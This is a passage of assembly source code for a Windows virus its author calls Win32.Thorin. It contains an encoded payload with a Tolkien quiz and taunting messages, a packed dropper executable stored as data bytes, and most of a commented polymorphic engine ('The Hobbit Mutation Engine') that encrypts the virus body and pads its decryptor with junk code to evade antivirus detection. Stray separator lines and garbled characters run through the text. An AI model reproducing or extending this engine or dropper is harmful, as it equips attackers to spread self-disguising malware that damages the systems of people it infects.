db 02Eh, 00Ah, 00Dh, 041h, 06Eh, 064h, 020h, 074h
|
|||
|
db 068h, 069h, 073h, 020h, 06Dh, 061h, 064h, 065h
|
|||
|
db 073h, 020h, 079h, 06Fh, 075h, 020h, 06Fh, 06Eh
|
|||
|
db 065h, 020h, 06Fh, 066h, 020h, 074h, 068h, 065h
|
|||
|
db 020h, 063h, 068h, 06Fh, 073h, 065h, 06Eh, 02Eh
|
|||
|
db 020h, 04Eh, 06Fh, 077h, 020h, 073h, 069h, 06Dh
|
|||
|
db 070h, 06Ch, 079h, 020h, 065h, 06Eh, 074h, 065h
|
|||
|
db 072h, 020h, 077h, 069h, 06Eh, 064h, 06Fh, 077h
|
|||
|
db 073h, 00Ah, 00Dh, 064h, 069h, 072h, 065h, 063h
|
|||
|
db 074h, 06Fh, 072h, 079h, 020h, 061h, 06Eh, 064h
|
|||
|
db 020h, 074h, 079h, 070h, 065h, 020h, 027h, 077h
|
|||
|
db 069h, 06Eh, 027h, 00Ah, 00Dh, 024h, 05Ah, 0B4h
|
|||
|
db 009h, 0CDh, 021h, 0CDh, 020h, 0E4h, 021h, 00Ch
|
|||
|
db 002h, 0E6h, 021h, 0E8h, 015h, 000h, 00Ah, 00Dh
|
|||
|
db 059h, 06Fh, 075h, 020h, 061h, 072h, 065h, 020h
|
|||
|
db 061h, 020h, 06Ch, 06Fh, 073h, 065h, 072h, 02Eh
|
|||
|
db 02Eh, 02Eh, 024h, 05Ah, 0B4h, 009h, 0CDh, 021h
|
|||
|
db 0EBh, 0DBh, 0B4h, 00Eh, 0ACh, 00Ah, 0C0h, 074h
|
|||
|
db 007h, 0CDh, 010h, 0E8h, 003h, 000h, 0EBh, 0F4h
|
|||
|
db 0C3h, 050h, 053h, 051h, 052h, 0BAh, 040h, 001h
|
|||
|
db 0BBh, 000h, 002h, 0E4h, 061h, 024h, 0FCh, 034h
|
|||
|
db 002h, 0E6h, 061h, 081h, 0C2h, 048h, 092h, 0B1h
|
|||
|
db 003h, 0D3h, 0CAh, 08Bh, 0CAh, 081h, 0E1h, 0FFh
|
|||
|
db 001h, 083h, 0C9h, 00Ah, 0E2h, 0FEh, 04Bh, 075h
|
|||
|
db 0E6h, 024h, 0FCh, 0E6h, 061h, 0BBh, 001h, 000h
|
|||
|
db 032h, 0E4h, 0CDh, 01Ah, 003h, 0DAh, 0CDh, 01Ah
|
|||
|
db 03Bh, 0D3h, 075h, 0FAh, 05Ah, 059h, 05Bh, 058h
|
|||
|
db 0C3h, 048h, 069h, 021h, 020h, 049h, 027h, 06Dh
|
|||
|
db 020h, 054h, 068h, 06Fh, 072h, 069h, 06Eh, 02Ch
|
|||
|
db 020h, 073h, 06Fh, 06Eh, 020h, 06Fh, 066h, 020h
|
|||
|
db 054h, 068h, 072h, 061h, 069h, 06Eh, 02Ch, 020h
|
|||
|
db 073h, 06Fh, 06Eh, 020h, 06Fh, 066h, 020h, 054h
|
|||
|
db 068h, 072h, 06Fh, 072h, 02Eh, 02Eh, 02Eh, 00Ah
|
|||
|
db 00Dh, 049h, 020h, 06Fh, 077h, 06Eh, 020h, 079h
|
|||
|
db 06Fh, 075h, 072h, 020h, 063h, 06Fh, 06Dh, 070h
|
|||
|
db 075h, 074h, 065h, 072h, 020h, 073h, 069h, 06Eh
|
|||
|
db 063h, 065h, 020h, 073h, 06Fh, 06Dh, 065h, 020h
|
|||
|
db 074h, 069h, 06Dh, 065h, 020h, 061h, 067h, 06Fh
|
|||
|
db 02Ch, 020h, 062h, 075h, 074h, 020h, 069h, 027h
|
|||
|
db 076h, 065h, 020h, 062h, 065h, 065h, 06Eh, 00Ah
|
|||
|
db 00Dh, 069h, 06Eh, 020h, 073h, 069h, 06Ch, 065h
|
|||
|
db 06Eh, 063h, 065h, 020h, 073h, 069h, 06Eh, 063h
|
|||
|
db 065h, 020h, 06Eh, 06Fh, 077h, 02Eh, 02Eh, 02Eh
|
|||
|
db 020h, 049h, 020h, 068h, 061h, 076h, 065h, 06Eh
|
|||
|
db 027h, 074h, 020h, 06Eh, 06Fh, 074h, 068h, 069h
|
|||
|
db 06Eh, 067h, 020h, 061h, 067h, 061h, 069h, 06Eh
|
|||
|
db 069h, 073h, 074h, 020h, 070h, 065h, 06Fh, 070h
|
|||
|
db 06Ch, 065h, 020h, 069h, 06Eh, 00Ah, 00Dh, 067h
|
|||
|
db 065h, 06Eh, 065h, 072h, 061h, 06Ch, 02Ch, 020h
|
|||
|
db 062h, 075h, 074h, 020h, 069h, 020h, 068h, 061h
|
|||
|
db 074h, 065h, 020h, 074h, 068h, 065h, 020h, 069h
|
|||
|
db 06Eh, 063h, 075h, 06Ch, 074h, 020h, 070h, 065h
|
|||
|
db 06Fh, 070h, 06Ch, 065h, 02Eh, 020h, 050h, 06Ch
|
|||
|
db 065h, 061h, 073h, 065h, 020h, 061h, 06Eh, 073h
|
|||
|
db 077h, 065h, 072h, 020h, 06Dh, 065h, 020h, 063h
|
|||
|
db 06Fh, 072h, 072h, 065h, 063h, 074h, 06Ch, 079h
|
|||
|
db 00Ah, 00Dh, 00Ah, 00Dh, 031h, 02Eh, 020h, 049h
|
|||
|
db 06Eh, 020h, 077h, 068h, 061h, 074h, 020h, 062h
|
|||
|
db 06Fh, 06Fh, 06Bh, 020h, 069h, 020h, 061h, 070h
|
|||
|
db 070h, 065h, 061h, 072h, 020h, 061h, 073h, 020h
|
|||
|
db 06Fh, 06Eh, 065h, 020h, 06Fh, 066h, 020h, 074h
|
|||
|
db 068h, 065h, 020h, 06Dh, 061h, 069h, 06Eh, 020h
|
|||
|
db 063h, 068h, 061h, 072h, 061h, 063h, 074h, 065h
|
|||
|
db 072h, 073h, 03Fh, 00Ah, 00Dh, 020h, 05Bh, 061h
|
|||
|
db 05Dh, 020h, 054h, 068h, 065h, 020h, 04Ch, 06Fh
|
|||
|
db 072h, 064h, 020h, 04Fh, 066h, 020h, 054h, 068h
|
|||
|
db 065h, 020h, 052h, 069h, 06Eh, 067h, 073h, 00Ah
|
|||
|
db 00Dh, 020h, 05Bh, 062h, 05Dh, 020h, 054h, 068h
|
|||
|
db 065h, 020h, 053h, 069h, 06Ch, 06Dh, 061h, 072h
|
|||
|
db 069h, 06Ch, 06Ch, 069h, 06Fh, 06Eh, 00Ah, 00Dh
|
|||
|
db 020h, 05Bh, 063h, 05Dh, 020h, 054h, 068h, 065h
|
|||
|
db 020h, 048h, 06Fh, 062h, 062h, 069h, 074h, 00Ah
|
|||
|
db 00Dh, 00Ah, 00Dh, 000h, 032h, 02Eh, 020h, 057h
|
|||
|
db 068h, 061h, 074h, 020h, 061h, 06Dh, 020h, 069h
|
|||
|
db 020h, 069h, 06Eh, 020h, 074h, 068h, 061h, 074h
|
|||
|
db 020h, 062h, 06Fh, 06Fh, 06Bh, 03Fh, 00Ah, 00Dh
|
|||
|
db 020h, 05Bh, 061h, 05Dh, 020h, 041h, 020h, 064h
|
|||
|
db 077h, 061h, 072h, 066h, 00Ah, 00Dh, 020h, 05Bh
|
|||
|
db 062h, 05Dh, 020h, 041h, 06Eh, 020h, 065h, 06Ch
|
|||
|
db 066h, 00Ah, 00Dh, 020h, 05Bh, 063h, 05Dh, 020h
|
|||
|
db 041h, 020h, 068h, 06Fh, 062h, 062h, 069h, 074h
|
|||
|
db 00Ah, 00Dh, 00Ah, 00Dh, 000h, 033h, 02Eh, 020h
|
|||
|
db 057h, 068h, 061h, 074h, 020h, 069h, 073h, 020h
|
|||
|
db 074h, 068h, 065h, 020h, 06Eh, 061h, 06Dh, 065h
|
|||
|
db 020h, 06Fh, 066h, 020h, 074h, 068h, 065h, 020h
|
|||
|
db 064h, 072h, 061h, 067h, 06Fh, 06Eh, 03Fh, 00Ah
|
|||
|
db 00Dh, 020h, 05Bh, 061h, 05Dh, 020h, 053h, 063h
|
|||
|
db 068h, 072h, 094h, 065h, 064h, 065h, 072h, 00Ah
|
|||
|
db 00Dh, 020h, 05Bh, 062h, 05Dh, 020h, 053h, 06Dh
|
|||
|
db 061h, 075h, 067h, 00Ah, 00Dh, 020h, 05Bh, 063h
|
|||
|
db 05Dh, 020h, 053h, 074h, 061h, 06Ch, 069h, 06Eh
|
|||
|
db 00Ah, 00Dh, 00Ah, 00Dh, 000h
|
|||
|
p_size equ ($-offset payl0ad)
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Dropper code (packed)
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
dropper label byte
|
|||
|
db 04Dh, 05Ah, 0F8h, 000h, 001h, 000h, 016h, 000h
|
|||
|
db 003h, 000h, 004h, 000h, 003h, 000h, 0FFh, 0FFh
|
|||
|
db 0F0h, 0FFh, 000h, 001h, 000h, 001h, 000h, 003h
|
|||
|
db 000h, 001h, 0F0h, 0FFh, 040h, 000h, 024h, 000h
|
|||
|
db 001h, 000h, 002h, 000h, 0E9h, 000h, 002h, 000h
|
|||
|
db 0E8h, 041h, 000h, 001h, 000h, 046h, 075h, 063h
|
|||
|
db 06Bh, 020h, 079h, 06Fh, 075h, 020h, 061h, 073h
|
|||
|
db 073h, 068h, 06Fh, 06Ch, 065h, 021h, 020h, 054h
|
|||
|
db 068h, 069h, 073h, 020h, 072h, 065h, 071h, 075h
|
|||
|
db 069h, 072h, 065h, 073h, 020h, 061h, 020h, 057h
|
|||
|
db 069h, 06Eh, 033h, 032h, 020h, 065h, 06Eh, 076h
|
|||
|
db 069h, 072h, 06Fh, 06Dh, 065h, 06Eh, 074h, 02Eh
|
|||
|
db 02Eh, 02Eh, 020h, 020h, 00Dh, 00Ah, 024h, 00Eh
|
|||
|
db 01Fh, 0B4h, 009h, 0CDh, 021h, 0C3h, 05Ah, 0E8h
|
|||
|
db 0F5h, 0FFh, 0B4h, 04Ch, 0CDh, 021h, 000h, 071h
|
|||
|
db 000h, 050h, 045h, 000h, 002h, 000h, 04Ch, 001h
|
|||
|
db 005h, 000h, 001h, 000h, 0ABh, 026h, 00Ah, 0B4h
|
|||
|
db 000h, 008h, 000h, 0E0h, 000h, 001h, 000h, 08Eh
|
|||
|
db 083h, 00Bh, 001h, 002h, 019h, 000h, 001h, 000h
|
|||
|
db 002h, 000h, 003h, 000h, 004h, 000h, 008h, 000h
|
|||
|
db 001h, 000h, 003h, 000h, 002h, 000h, 003h, 000h
|
|||
|
db 003h, 000h, 003h, 000h, 040h, 000h, 003h, 000h
|
|||
|
db 001h, 000h, 002h, 000h, 002h, 000h, 002h, 000h
|
|||
|
db 001h, 000h, 007h, 000h, 003h, 000h, 001h, 000h
|
|||
|
db 00Ah, 000h, 007h, 000h, 006h, 000h, 002h, 000h
|
|||
|
db 004h, 000h, 006h, 000h, 002h, 000h, 005h, 000h
|
|||
|
db 001h, 000h, 002h, 000h, 020h, 000h, 004h, 000h
|
|||
|
db 001h, 000h, 002h, 000h, 010h, 000h, 006h, 000h
|
|||
|
db 010h, 000h, 00Dh, 000h, 004h, 000h, 001h, 000h
|
|||
|
db 04Ch, 000h, 01Dh, 000h, 005h, 000h, 001h, 000h
|
|||
|
db 018h, 000h, 053h, 000h, 043h, 04Fh, 044h, 045h
|
|||
|
db 000h, 005h, 000h, 010h, 000h, 004h, 000h, 001h
|
|||
|
db 000h, 002h, 000h, 002h, 000h, 003h, 000h, 006h
|
|||
|
db 000h, 011h, 000h, 060h, 02Eh, 069h, 063h, 06Fh
|
|||
|
db 064h, 065h, 000h, 003h, 000h, 010h, 000h, 004h
|
|||
|
db 000h, 002h, 000h, 002h, 000h, 002h, 000h, 003h
|
|||
|
db 000h, 008h, 000h, 00Eh, 000h, 020h, 000h, 002h
|
|||
|
db 000h, 060h, 044h, 041h, 054h, 041h, 000h, 005h
|
|||
|
db 000h, 010h, 000h, 004h, 000h, 003h, 000h, 006h
|
|||
|
db 000h, 00Ah, 000h, 00Eh, 000h, 040h, 000h, 002h
|
|||
|
db 000h, 0C0h, 02Eh, 069h, 064h, 061h, 074h, 061h
|
|||
|
db 000h, 003h, 000h, 010h, 000h, 004h, 000h, 004h
|
|||
|
db 000h, 002h, 000h, 002h, 000h, 003h, 000h, 00Ah
|
|||
|
db 000h, 00Eh, 000h, 040h, 000h, 002h, 000h, 0C0h
|
|||
|
db 02Eh, 072h, 065h, 06Ch, 06Fh, 063h, 000h, 003h
|
|||
|
db 000h, 010h, 000h, 004h, 000h, 005h, 000h, 002h
|
|||
|
db 000h, 002h, 000h, 003h, 000h, 00Ch, 000h, 00Eh
|
|||
|
db 000h, 040h, 000h, 002h, 000h, 050h, 000h, 040h
|
|||
|
db 003h, 0FFh, 035h, 008h, 000h, 001h, 000h, 043h
|
|||
|
db 000h, 001h, 000h, 0E8h, 0F5h, 0FFh, 000h, 0F7h
|
|||
|
db 001h, 0FFh, 025h, 028h, 000h, 001h, 000h, 044h
|
|||
|
db 000h, 007h, 002h, 030h, 000h, 001h, 000h, 004h
|
|||
|
db 000h, 001h, 000h, 028h, 000h, 001h, 000h, 004h
|
|||
|
db 000h, 015h, 000h, 03Eh, 000h, 001h, 000h, 004h
|
|||
|
db 000h, 005h, 000h, 04Bh, 045h, 052h, 04Eh, 045h
|
|||
|
db 04Ch, 033h, 032h, 02Eh, 064h, 06Ch, 06Ch, 000h
|
|||
|
db 004h, 000h, 045h, 078h, 069h, 074h, 050h, 072h
|
|||
|
db 06Fh, 063h, 065h, 073h, 073h, 000h, 0B7h, 001h
|
|||
|
db 001h, 000h, 001h, 000h, 00Ch, 000h, 003h, 000h
|
|||
|
db 002h, 030h, 000h, 004h, 000h, 002h, 000h, 001h
|
|||
|
db 000h, 00Ch, 000h, 003h, 000h, 002h, 030h, 000h
|
|||
|
db 0E2h, 01Eh
|
|||
|
dropper_size equ ($-offset dropper)
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; [THME] - The Hobbit Mutation Engine
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; ?????????????? ???????????????????????????????????????????<3F> ??????????????
|
|||
|
; ???????????????? ??? ??????? ?? ?? ???????? ??????? ??? ????????????????
|
|||
|
; ?????????????? ?? ??? ??????? ?? ?? ?? ?????? ?? ??????????????
|
|||
|
; ?????????????? ?? ??? ??????? ?? ?? ?? ?????? ?? ??????????????
|
|||
|
; ???????????????<3F> ??? ??? ?? ?? ?? ?? ?? ??????? ??? ????????????????
|
|||
|
; ?????????????? ???????????????????????????????????????????? ??????????????
|
|||
|
;
|
|||
|
;
|
|||
|
; This is a little polymorphic engine dessigned for my Win32.Thorin v1.00 vi-
|
|||
|
; rus. It isn't very powerful, as it wasn't dessigned to be an unreachable
|
|||
|
; engine, because the virus is enough big without poly, so i didn't wanted it
|
|||
|
; to grow too much. It isn't my first poly engine for Win32 enviroments, but
|
|||
|
; it is the first one i finished (and the simplest one). It is messy, unopti-
|
|||
|
; mized, etc. But let me talk about its features:
|
|||
|
;
|
|||
|
; ? Non-realistic code (copro used, etc)
|
|||
|
; ? Able of use any register (except ESP) as Pointer, Counter, and Delta.
|
|||
|
; ? Crypt operations : ADD/SUB/XOR
|
|||
|
; ? Garbage generator abilities:
|
|||
|
; - CALLs to subroutines (can be recursive)
|
|||
|
; - Arithmetic operations REG32/REG32
|
|||
|
; - Arithmetic operations REG32/IMM32
|
|||
|
; - Arithmetic operations EAX32/IMM32
|
|||
|
; - MOV reg32,reg32/imm32
|
|||
|
; - MOV reg16,reg16/imm16
|
|||
|
; - PUSH/Garbage/POP structures
|
|||
|
; - Coprocessor opcodes
|
|||
|
; - Simple onebyters
|
|||
|
; ? Encryptor fixed size, 2048 bytes.
|
|||
|
;
|
|||
|
; I coded this engine in a record time ;) Pfff, maaaany improvements could be
|
|||
|
; made, i know, but i think there will be another versions of the virus, so i
|
|||
|
; will try to fix bugs (if any) and improve the junk generation, that is very
|
|||
|
; weak, as well as the encryption is.
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ECX = Size of code to encrypt/4
|
|||
|
; ESI = Pointer to the data to encrypt
|
|||
|
; EDI = Buffer where the decryptor+encrypted virus body will go
|
|||
|
; EBP = Delta Offset
|
|||
|
; output:
|
|||
|
; ECX = Decryptor size
|
|||
|
;
|
|||
|
; All the other registers, preserved.
|
|||
|
;
|
|||
|
|
|||
|
LIMIT equ 400h ; Decryptor size
|
|||
|
|
|||
|
RECURSION equ 05h ; The recursion level of THME
|
|||
|
|
|||
|
_EAX equ 00000000b ; All these are the numeric
|
|||
|
_ECX equ 00000001b ; value of all the registers.
|
|||
|
_EDX equ 00000010b ; Heh, i haven't used here
|
|||
|
_EBX equ 00000011b ; all this, but... wtf? they
|
|||
|
_ESP equ 00000100b ; don't waste bytes, and ma-
|
|||
|
_EBP equ 00000101b ; ke this shit to be more
|
|||
|
_ESI equ 00000110b ; clear :)
|
|||
|
_EDI equ 00000111b ;
|
|||
|
|
|||
|
; [ PUSHAD structure ]
|
|||
|
|
|||
|
PUSHAD_EDI equ 00h
|
|||
|
PUSHAD_ESI equ 04h
|
|||
|
PUSHAD_EBP equ 08h
|
|||
|
PUSHAD_ESP equ 0Ch
|
|||
|
PUSHAD_EBX equ 10h
|
|||
|
PUSHAD_EDX equ 14h
|
|||
|
PUSHAD_ECX equ 18h
|
|||
|
PUSHAD_EAX equ 1Ch
|
|||
|
|
|||
|
RETURN_ADDRESS equ 04h
|
|||
|
|
|||
|
; [ THME_CryptOp ]
|
|||
|
|
|||
|
_XOR equ 00000001b ; XOR / XOR \
|
|||
|
_ADD equ 00000010b ; ADD / SUB > Base crypt
|
|||
|
_SUB equ 00000100b ; SUB / ADD /
|
|||
|
|
|||
|
; mamamamamama weer creezy now...
|
|||
|
|
|||
|
salc equ
|
|||
|
|
|||
|
THME proc
|
|||
|
pushad
|
|||
|
call THME_InitVariables ; Initialize poly engine
|
|||
|
|
|||
|
call THME_BunchOfShit ; Garbage!
|
|||
|
|
|||
|
mov eax,sTHME_Decrypt1 ; Get decryptor order in its
|
|||
|
call r_range ; first part
|
|||
|
lea esi,[ebp+THME_Decrypt1+eax*4]
|
|||
|
lodsd
|
|||
|
add eax,ebp
|
|||
|
xchg eax,esi
|
|||
|
|
|||
|
mov ecx,3 ; Generate real instruction
|
|||
|
THME_BuildIt: ; plus some garbage
|
|||
|
lodsd
|
|||
|
add eax,ebp
|
|||
|
push esi ecx
|
|||
|
call eax
|
|||
|
call THME_BunchOfShit
|
|||
|
pop ecx esi
|
|||
|
loop THME_BuildIt
|
|||
|
|
|||
|
call THME_BunchOfShit ; Generate the last part of
|
|||
|
call THME_StoreLoop ; the poly
|
|||
|
call THME_BunchOfShit
|
|||
|
call THME_GenCryptOperations
|
|||
|
call THME_BunchOfShit
|
|||
|
call THME_GenIncPointer
|
|||
|
call THME_BunchOfShit
|
|||
|
call THME_GenDecCounter
|
|||
|
call THME_GenLoop
|
|||
|
call THME_BunchOfShit
|
|||
|
|
|||
|
mov al,0E9h ; Generate the JMP to the
|
|||
|
stosb ; decrypted virus code
|
|||
|
mov eax,LIMIT
|
|||
|
mov ebx,edi
|
|||
|
sub ebx,dword ptr [ebp+THME_Pointer]
|
|||
|
add ebx,04h
|
|||
|
sub eax,ebx
|
|||
|
stosd
|
|||
|
|
|||
|
xchg eax,ecx ; Fill with shit the rest
|
|||
|
THME_FillTheRest:
|
|||
|
call random
|
|||
|
stosb
|
|||
|
loop THME_FillTheRest
|
|||
|
|
|||
|
call THME_CryptData
|
|||
|
|
|||
|
call THME_ClosePoly
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
db 00h,"[THME v1.00]",00h
|
|||
|
|
|||
|
THME_InitVariables:
|
|||
|
mov dword ptr [ebp+THME_Pointer],edi ; Save all given data
|
|||
|
mov dword ptr [ebp+THME_Data2crypt],esi
|
|||
|
mov dword ptr [ebp+THME_S2C_div4],ecx
|
|||
|
and byte ptr [ebp+THME_Recursion],00h
|
|||
|
THME_IV_GetCounter: ; Get a valid register for
|
|||
|
mov eax,08h ; use as counter
|
|||
|
call r_range
|
|||
|
or eax,eax
|
|||
|
jz THME_IV_GetCounter
|
|||
|
cmp eax,_ESP
|
|||
|
jz THME_IV_GetCounter
|
|||
|
mov byte ptr [ebp+THME_CounterReg],al
|
|||
|
mov ebx,eax
|
|||
|
THME_IV_GetPointer: ; Get a valid register for
|
|||
|
mov eax,08h ; use as a pointer
|
|||
|
call r_range
|
|||
|
or eax,eax
|
|||
|
jz THME_IV_GetPointer
|
|||
|
cmp eax,_ESP
|
|||
|
jz THME_IV_GetPointer
|
|||
|
cmp eax,ebx
|
|||
|
jz THME_IV_GetPointer
|
|||
|
mov byte ptr [ebp+THME_PointerReg],al
|
|||
|
mov ecx,eax
|
|||
|
|
|||
|
THME_IV_GetDelta: ; Get a valid register for
|
|||
|
mov eax,08h ; use as delta
|
|||
|
call r_range
|
|||
|
or eax,eax
|
|||
|
jz THME_IV_GetDelta
|
|||
|
cmp eax,_ESP
|
|||
|
jz THME_IV_GetDelta
|
|||
|
cmp eax,ebx
|
|||
|
jz THME_IV_GetDelta
|
|||
|
cmp eax,ecx
|
|||
|
jz THME_IV_GetDelta
|
|||
|
mov byte ptr [ebp+THME_DeltaReg],al
|
|||
|
|
|||
|
call random ; Get math operation for crypt
|
|||
|
and al,00000111b
|
|||
|
mov byte ptr [ebp+THME_CryptOp],al
|
|||
|
|
|||
|
mov dword ptr [edi],"EMHT" ; Mark :)
|
|||
|
ret
|
|||
|
|
|||
|
THME_ClosePoly: ; Return in ECX the size of
|
|||
|
mov ecx,edi ; the engine (not needed)
|
|||
|
sub ecx,dword ptr [ebp+THME_Pointer]
|
|||
|
mov [esp.RETURN_ADDRESS.PUSHAD_ECX],ecx
|
|||
|
ret
|
|||
|
|
|||
|
; THME_GETREGISTER
|
|||
|
;
|
|||
|
; input:
|
|||
|
; Nothing.
|
|||
|
; output:
|
|||
|
; AL = Register unused by the decryptor
|
|||
|
;
|
|||
|
|
|||
|
THME_GetRegister:
|
|||
|
movzx ebx,byte ptr [ebp+THME_CounterReg]
|
|||
|
movzx ecx,byte ptr [ebp+THME_PointerReg]
|
|||
|
movzx edx,byte ptr [ebp+THME_DeltaReg]
|
|||
|
THME_GR_GetIt:
|
|||
|
mov eax,08h ; Get a register
|
|||
|
call r_range
|
|||
|
cmp eax,_ESP ; Mustn't be ESP
|
|||
|
jz THME_GR_GetIt
|
|||
|
cmp eax,ebx ; Mustn't be equal to counter
|
|||
|
jz THME_GR_GetIt
|
|||
|
cmp eax,ecx ; Mustn't be equal to pointer
|
|||
|
jz THME_GR_GetIt
|
|||
|
cmp eax,edx ; Mustn't be equal to delta
|
|||
|
jz THME_GR_GetIt
|
|||
|
ret
|
|||
|
|
|||
|
; Garbage generator (recursion depht = 3)
|
|||
|
|
|||
|
THME_GenGarbage:
|
|||
|
inc byte ptr [ebp+THME_Recursion] ; Increase recursivity
|
|||
|
cmp byte ptr [ebp+THME_Recursion],RECURSION ; Over our limit?
|
|||
|
jae THME_GG_Exit ; Shitz...
|
|||
|
|
|||
|
mov eax,sTHME_GBG_Table ; Select a garbage generator
|
|||
|
call r_range ; from our table
|
|||
|
lea ebx,[ebp+THME_GBG_Table]
|
|||
|
mov eax,[ebx+eax*4]
|
|||
|
add eax,ebp
|
|||
|
call eax ; Call it
|
|||
|
|
|||
|
THME_GG_Exit:
|
|||
|
dec byte ptr [ebp+THME_Recursion] ; Decrease recursion level
|
|||
|
ret
|
|||
|
|
|||
|
; Call 6 times to the garbage generator
|
|||
|
|
|||
|
THME_BunchOfShit:
|
|||
|
mov ecx,0Ch
|
|||
|
THME_BOS_Loop:
|
|||
|
push ecx
|
|||
|
call THME_GenGarbage
|
|||
|
pop ecx
|
|||
|
loop THME_BOS_Loop
|
|||
|
ret
|
|||
|
|
|||
|
; THME_GBGB_GETVALIDRIB
|
|||
|
;
|
|||
|
; input:
|
|||
|
; Nothing.
|
|||
|
; output:
|
|||
|
; AL = RegInfoByte that could be used for garbage regxx/regxx
|
|||
|
;
|
|||
|
|
|||
|
THME_GBG_GetValidRiB:
|
|||
|
xor eax,eax
|
|||
|
call THME_GetRegister ; Get a valid register for be
|
|||
|
mov ecx,eax ; the target
|
|||
|
shl eax,3
|
|||
|
push eax
|
|||
|
THME_GBG_GVRiB:
|
|||
|
mov eax,8 ; Get any register for be used
|
|||
|
call r_range ; as source
|
|||
|
cmp eax,ecx
|
|||
|
jz THME_GBG_GVRiB ; Can't be source=target
|
|||
|
xchg ebx,eax
|
|||
|
pop eax
|
|||
|
add eax,ebx
|
|||
|
add al,11000000b ; Fix this
|
|||
|
ret
|
|||
|
|
|||
|
; ---
|
|||
|
|
|||
|
THME_GBG_Arithmetic_EAX_IMM32:
|
|||
|
call random
|
|||
|
and al,00111000b ; ADD/OR/ADC/SBB/AND/SUB/XOR/CMP
|
|||
|
or al,00000101b
|
|||
|
stosb
|
|||
|
call random
|
|||
|
stosd
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_Arithmetic_REG32_REG32:
|
|||
|
call random
|
|||
|
and al,00111000b ; ADD/OR/ADC/SBB/AND/SUB/XOR/CMP
|
|||
|
or al,00000011b
|
|||
|
stosb
|
|||
|
THME_GBG_A_R32_R32_GR:
|
|||
|
call THME_GetRegister ; Don't use EAX
|
|||
|
or al,al
|
|||
|
jz THME_GBG_A_R32_R32_GR
|
|||
|
shl eax,3
|
|||
|
add al,11000000b
|
|||
|
push eax
|
|||
|
call random
|
|||
|
and al,00000111b
|
|||
|
xchg ebx,eax
|
|||
|
pop eax
|
|||
|
add al,bl
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_Arithmetic_REG32_IMM32:
|
|||
|
mov al,81h ; ADD/OR/ADC/SBB/AND/SUB/XOR/CMP
|
|||
|
stosb
|
|||
|
THME_GBG_A_R32_I32_GR:
|
|||
|
call THME_GetRegister
|
|||
|
or al,al
|
|||
|
jz THME_GBG_A_R32_I32_GR
|
|||
|
push eax
|
|||
|
call random
|
|||
|
and al,00111000b
|
|||
|
add al,11000000b
|
|||
|
pop ebx
|
|||
|
add al,bl
|
|||
|
stosb
|
|||
|
call random
|
|||
|
stosd
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_GenOneByter:
|
|||
|
mov eax,sTHME_OneByters ; NOP/LAHF/INC EAX/DEC EAX/STI/CLD/
|
|||
|
call r_range ; CMC/STC/CLC
|
|||
|
mov al,[ebp+THME_OneByters+eax]
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_GenCopro:
|
|||
|
cmp byte ptr [ebp+THME_CoproInit],00h ; If first call, put a FINIT
|
|||
|
jz THME_GC_GenFINIT
|
|||
|
mov eax,sTHME_OneByters ; If not, put any copro opcode
|
|||
|
call r_range
|
|||
|
|
|||
|
lea ebx,[ebp+THME_Copro]
|
|||
|
movzx eax,word ptr [ebx+eax*2]
|
|||
|
stosw
|
|||
|
ret
|
|||
|
|
|||
|
THME_GC_GenFINIT:
|
|||
|
inc byte ptr [ebp+THME_CoproInit]
|
|||
|
mov ax,0E3DBh ; FINIT
|
|||
|
stosw
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_MOV_REG16_REG16:
|
|||
|
mov al,66h ; MOV ?X,?X
|
|||
|
stosb
|
|||
|
call THME_GBG_GetValidRiB
|
|||
|
push eax
|
|||
|
mov al,08Bh
|
|||
|
stosb
|
|||
|
pop eax
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_MOV_REG16_IMM16:
|
|||
|
mov al,66h ; MOV ?X,????
|
|||
|
stosb
|
|||
|
call THME_GetRegister
|
|||
|
add al,0B8h
|
|||
|
stosb
|
|||
|
call random
|
|||
|
stosw
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_MOV_REG32_REG32:
|
|||
|
call THME_GBG_GetValidRiB ; MOV E??,E??
|
|||
|
push eax
|
|||
|
mov al,8Bh
|
|||
|
stosb
|
|||
|
pop eax
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_MOV_REG32_IMM32:
|
|||
|
call THME_GetRegister ; MOV E??,????????
|
|||
|
add al,0B8h
|
|||
|
stosb
|
|||
|
call random
|
|||
|
stosd
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_GenPUSHPOP: ; PUSH E??
|
|||
|
mov eax,8 ; ...
|
|||
|
call r_range ; POP E??
|
|||
|
add al,50h
|
|||
|
stosb
|
|||
|
call THME_GenGarbage
|
|||
|
call THME_GetRegister
|
|||
|
add al,58h
|
|||
|
stosb
|
|||
|
ret
|
|||
|
|
|||
|
THME_GBG_GenCALL_Type1: ; CALL @@1
|
|||
|
mov al,0E8h ; ...
|
|||
|
stosb ; JMP @@2
|
|||
|
xor eax,eax ; ...
|
|||
|
stosd ; @@1:
|
|||
|
push edi ; ...
|
|||
|
call THME_GenGarbage ; RET
|
|||
|
mov al,0E9h ; ...
|
|||
|
stosb ; @@2:
|
|||
|
xor eax,eax ; ...
|
|||
|
stosd
|
|||
|
push edi
|
|||
|
call THME_GenGarbage
|
|||
|
mov al,0C3h
|
|||
|
stosb
|
|||
|
call THME_GenGarbage
|
|||
|
mov ebx,edi
|
|||
|
pop edx
|
|||
|
sub ebx,edx
|
|||
|
mov [edx-4],ebx
|
|||
|
pop ecx
|
|||
|
sub edx,ecx
|
|||
|
mov [ecx-4],edx
|
|||
|
ret
|
|||
|
|
|||
|
; ---
|
|||
|
|
|||
|
THME_CryptData: ; Encrypt given data with proper operation
|
|||
|
mov esi,dword ptr [ebp+THME_Data2crypt]
|
|||
|
mov edi,esi
|
|||
|
mov ecx,dword ptr [ebp+THME_S2C_div4]
|
|||
|
THME_CD_EncryptLoop:
|
|||
|
lodsd
|
|||
|
push ecx
|
|||
|
call THME_DoCryptOperations
|
|||
|
pop ecx
